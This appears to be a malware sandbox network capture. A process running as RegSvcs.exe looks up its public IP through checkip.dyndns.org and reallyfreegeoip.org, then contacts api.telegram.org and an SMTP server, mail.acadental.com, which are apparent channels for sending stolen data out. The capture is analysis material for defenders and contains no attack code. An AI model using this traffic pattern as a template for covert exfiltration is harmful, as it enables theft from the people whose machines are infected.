                                                                                                                Jan 10, 2025 19:11:00.597810984 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.597882032 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.597975016 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.602914095 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:01.197823048 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.202238083 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:01.207194090 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.407902002 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.446121931 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.446166039 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.446583033 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.451173067 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.451196909 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.459976912 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:01.908940077 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.909038067 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.910542965 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.910554886 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.910837889 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:01.959875107 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:01.966417074 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.007323027 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.074281931 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.074462891 CET44349826104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.074562073 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.077634096 CET49826443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.080760956 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.085613012 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.265723944 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.268007994 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.268053055 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.268124104 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.268423080 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.268439054 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.319252014 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:02.738698006 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.740797043 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.740829945 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.891204119 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.891267061 CET44349833104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:11:02.891340971 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.891874075 CET49833443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:11:02.895240068 CET4982080192.168.2.6193.122.6.168
Jan 10, 2025 19:11:02.896651030 CET  49838  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:02.900286913 CET  80     49820  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:02.900378942 CET  49820  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:02.901544094 CET  80     49838  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:02.901632071 CET  49838  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:02.901779890 CET  49838  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:02.906558990 CET  80     49838  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:03.531225920 CET  80     49838  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:03.534493923 CET  49844  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:03.534533024 CET  443    49844  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:03.534673929 CET  49844  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:03.535337925 CET  49844  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:03.535348892 CET  443    49844  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:03.584907055 CET  49838  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:03.993501902 CET  443    49844  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:04.001327991 CET  49844  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:04.001346111 CET  443    49844  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:04.124414921 CET  443    49844  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:04.124483109 CET  443    49844  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:04.124552011 CET  49844  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:04.125149012 CET  49844  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:04.130407095 CET  49850  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:04.135247946 CET  80     49850  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:04.135327101 CET  49850  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:04.135421038 CET  49850  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:04.140237093 CET  80     49850  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:04.770710945 CET  80     49850  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:04.772052050 CET  49853  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:04.772098064 CET  443    49853  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:04.772243023 CET  49853  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:04.772659063 CET  49853  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:04.772675037 CET  443    49853  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:04.819256067 CET  49850  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:05.253787041 CET  443    49853  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:05.255522013 CET  49853  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:05.255563021 CET  443    49853  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:05.411781073 CET  443    49853  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:05.411843061 CET  443    49853  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:05.412149906 CET  49853  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:05.412488937 CET  49853  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:05.416765928 CET  49850  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:05.417942047 CET  49858  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:05.421715975 CET  80     49850  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:05.421823978 CET  49850  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:05.422791004 CET  80     49858  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:05.422878027 CET  49858  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:05.423007011 CET  49858  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:05.427757978 CET  80     49858  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:06.068742037 CET  80     49858  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:06.070452929 CET  49864  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:06.070511103 CET  443    49864  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:06.070578098 CET  49864  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:06.072776079 CET  49864  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:06.072805882 CET  443    49864  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:06.081448078 CET  49736  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:06.116126060 CET  49858  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:06.526645899 CET  443    49864  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:06.528325081 CET  49864  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:06.528378010 CET  443    49864  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:06.677373886 CET  443    49864  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:06.677443027 CET  443    49864  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:06.677791119 CET  49864  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:06.678055048 CET  49864  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:06.681461096 CET  49858  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:06.682781935 CET  49870  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:06.686628103 CET  80     49858  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:06.686691046 CET  49858  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:06.687674999 CET  80     49870  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:06.687741995 CET  49870  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:06.687894106 CET  49870  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:06.692712069 CET  80     49870  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:06.846889973 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:06.851773977 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:06.851846933 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:07.314578056 CET  80     49870  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:07.323266029 CET  49876  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:07.323333025 CET  443    49876  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:07.323417902 CET  49876  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:07.323790073 CET  49876  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:07.323807001 CET  443    49876  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:07.366123915 CET  49870  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:07.367440939 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:07.367710114 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:07.372545004 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:07.484662056 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:07.488297939 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:07.493163109 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:07.605179071 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:07.605551004 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:07.610455036 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:07.779444933 CET  443    49876  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:07.781245947 CET  49876  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:07.781302929 CET  443    49876  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:07.926428080 CET  443    49876  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:07.926502943 CET  443    49876  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:07.926788092 CET  49876  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:07.927154064 CET  49876  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:07.932034969 CET  49870  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:07.933500051 CET  49882  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:07.937333107 CET  80     49870  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:07.937560081 CET  49870  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:07.938349962 CET  80     49882  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:07.938452959 CET  49882  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:07.938612938 CET  49882  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:07.943463087 CET  80     49882  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:08.594248056 CET  80     49882  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:08.595876932 CET  49885  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:08.595922947 CET  443    49885  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:08.596076012 CET  49885  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:08.596556902 CET  49885  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:08.596574068 CET  443    49885  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:08.647504091 CET  49882  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:09.077857018 CET  443    49885  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:09.080430984 CET  49885  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:09.080451965 CET  443    49885  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:09.226223946 CET  443    49885  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:09.226285934 CET  443    49885  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:09.226694107 CET  49885  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:09.226845980 CET  49885  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:09.230262041 CET  49882  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:09.231564999 CET  49890  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:09.235362053 CET  80     49882  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:09.235447884 CET  49882  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:09.236452103 CET  80     49890  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:09.236541986 CET  49890  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:09.236655951 CET  49890  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:09.241416931 CET  80     49890  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:09.883912086 CET  80     49890  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:09.885165930 CET  49896  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:09.885206938 CET  443    49896  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:09.885271072 CET  49896  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:09.885519028 CET  49896  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:09.885529041 CET  443    49896  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:09.928612947 CET  49890  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:10.358685970 CET  443    49896  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:10.360286951 CET  49896  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:10.360318899 CET  443    49896  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:10.509161949 CET  443    49896  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:10.509234905 CET  443    49896  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:10.509354115 CET  49896  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:10.509850979 CET  49896  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:10.512722015 CET  49890  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:10.513950109 CET  49902  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:10.517657042 CET  80     49890  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:10.517723083 CET  49890  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:10.518748999 CET  80     49902  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:10.518807888 CET  49902  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:10.518908024 CET  49902  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:10.523637056 CET  80     49902  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:11.120903969 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:11.121153116 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:11.126039982 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:11.147424936 CET  80     49902  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:11.148761034 CET  49907  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:11.148806095 CET  443    49907  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:11.148880005 CET  49907  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:11.149142027 CET  49907  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:11.149156094 CET  443    49907  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:11.194266081 CET  49902  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:11.239209890 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:11.239459991 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:11.244358063 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:11.357387066 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:11.391159058 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:11.396223068 CET  587    49871  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:11.396353006 CET  49871  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:11.632648945 CET  443    49907  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:11.634253025 CET  49907  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:11.634264946 CET  443    49907  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:11.798314095 CET  443    49907  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:11.798387051 CET  443    49907  104.21.16.1      192.168.2.6
Jan 10, 2025 19:11:11.798437119 CET  49907  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:11.799060106 CET  49907  443    192.168.2.6      104.21.16.1
Jan 10, 2025 19:11:11.818640947 CET  49902  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:11.819009066 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:11.819061995 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:11.819114923 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:11.820097923 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:11.820108891 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:11.823705912 CET  80     49902  193.122.6.168    192.168.2.6
Jan 10, 2025 19:11:11.823760986 CET  49902  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:12.442509890 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:12.442596912 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:12.444207907 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:12.444216013 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:12.444494963 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:12.446074963 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:12.487322092 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:12.687706947 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:12.687887907 CET  443    49913  149.154.167.220  192.168.2.6
Jan 10, 2025 19:11:12.689742088 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:12.690125942 CET  49913  443    192.168.2.6      149.154.167.220
Jan 10, 2025 19:11:17.869951010 CET  49838  80     192.168.2.6      193.122.6.168
Jan 10, 2025 19:11:18.009519100 CET  49947  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:18.014437914 CET  587    49947  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:18.014503956 CET  49947  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:18.559165001 CET  587    49947  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:18.559390068 CET  49947  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:18.564546108 CET  587    49947  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:18.680435896 CET  587    49947  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:18.680958033 CET  49947  587    192.168.2.6      3.130.71.34
Jan 10, 2025 19:11:18.686785936 CET  587    49947  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:22.805089951 CET  587    49947  3.130.71.34      192.168.2.6
Jan 10, 2025 19:11:22.805380106 CET  49947  587    192.168.2.6      3.130.71.34
                                                                                                                Jan 10, 2025 19:11:22.810209990 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.548578978 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.548854113 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:26.553730011 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.669436932 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.669635057 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:26.676373959 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.792495012 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.792799950 CET49947587192.168.2.63.130.71.34
                                                                                                                Jan 10, 2025 19:11:26.798331976 CET587499473.130.71.34192.168.2.6
                                                                                                                Jan 10, 2025 19:11:26.798409939 CET49947587192.168.2.63.130.71.34
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 19:10:44.553699970 CET | 55070 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 19:10:44.561686039 CET | 53 | 55070 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 19:10:45.684606075 CET | 65107 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 19:10:45.793999910 CET | 53 | 65107 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 19:10:59.692305088 CET | 55896 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 19:10:59.699177980 CET | 53 | 55896 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 19:11:06.660609961 CET | 60497 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 19:11:06.845731020 CET | 53 | 60497 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 19:10:44.553699970 CET | 192.168.2.6 | 1.1.1.1 | 0xb0d6 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.684606075 CET | 192.168.2.6 | 1.1.1.1 | 0x9050 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:59.692305088 CET | 192.168.2.6 | 1.1.1.1 | 0x5341 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:11:06.660609961 CET | 192.168.2.6 | 1.1.1.1 | 0xb00 | Standard query (0) | mail.acadental.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 19:10:44.561686039 CET | 1.1.1.1 | 192.168.2.6 | 0xb0d6 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 19:10:44.561686039 CET | 1.1.1.1 | 192.168.2.6 | 0xb0d6 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:44.561686039 CET | 1.1.1.1 | 192.168.2.6 | 0xb0d6 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:44.561686039 CET | 1.1.1.1 | 192.168.2.6 | 0xb0d6 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:44.561686039 CET | 1.1.1.1 | 192.168.2.6 | 0xb0d6 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:44.561686039 CET | 1.1.1.1 | 192.168.2.6 | 0xb0d6 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.793999910 CET | 1.1.1.1 | 192.168.2.6 | 0x9050 | No error (0) | reallyfreegeoip.org | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.793999910 CET | 1.1.1.1 | 192.168.2.6 | 0x9050 | No error (0) | reallyfreegeoip.org | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.793999910 CET | 1.1.1.1 | 192.168.2.6 | 0x9050 | No error (0) | reallyfreegeoip.org | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.793999910 CET | 1.1.1.1 | 192.168.2.6 | 0x9050 | No error (0) | reallyfreegeoip.org | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.793999910 CET | 1.1.1.1 | 192.168.2.6 | 0x9050 | No error (0) | reallyfreegeoip.org | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.793999910 CET | 1.1.1.1 | 192.168.2.6 | 0x9050 | No error (0) | reallyfreegeoip.org | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:45.793999910 CET | 1.1.1.1 | 192.168.2.6 | 0x9050 | No error (0) | reallyfreegeoip.org | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:10:59.699177980 CET | 1.1.1.1 | 192.168.2.6 | 0x5341 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:11:06.845731020 CET | 1.1.1.1 | 192.168.2.6 | 0xb00 | No error (0) | mail.acadental.com | - | 3.130.71.34 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:44.585953951 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:10:45.235472918 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:45 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 19:10:45.449196100 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:10:45.640822887 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:45 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
